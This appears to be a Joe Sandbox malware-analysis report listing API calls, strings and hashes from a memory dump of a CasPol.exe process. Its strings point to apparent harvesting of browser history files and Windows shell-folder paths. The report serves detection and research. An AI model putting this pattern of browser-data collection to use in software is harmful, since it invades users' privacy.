                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2911713577-0
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp
                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                  • API String ID: 2705122986-2036018995
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                  • String ID: /nosort$/sort
                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  Strings
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                  • API String ID: 3354267031-2114579845
                                                                                                                  APIs
                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3473537107-0
Strings
• only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
Similarity
• API ID: memset
• String ID: only a single result allowed for a SELECT that is part of an expression
• API String ID: 2221118986-1725073988
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
APIs
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
• memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
• API String ID: 2808797137-435121686
Strings
• duplicate column name: %s, xrefs: 004307FE
• too many columns on %s, xrefs: 00430763
Similarity
• API ID:
• String ID: duplicate column name: %s$too many columns on %s
• API String ID: 0-1445880494
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1156039329-0
                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
• Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
• Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
• Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
• Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
APIs
• Sleep.KERNEL32(00000064), ref: 004175D0
• CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
• Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
• Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
• Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
• Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
• Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
• Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
• Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
• Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
• Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
• Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
• Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
• Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
• Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
• Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
• Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
• Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
• Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
• Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
• Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
• Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
• Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
• Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1381354015-0
                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2221118986-0
                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
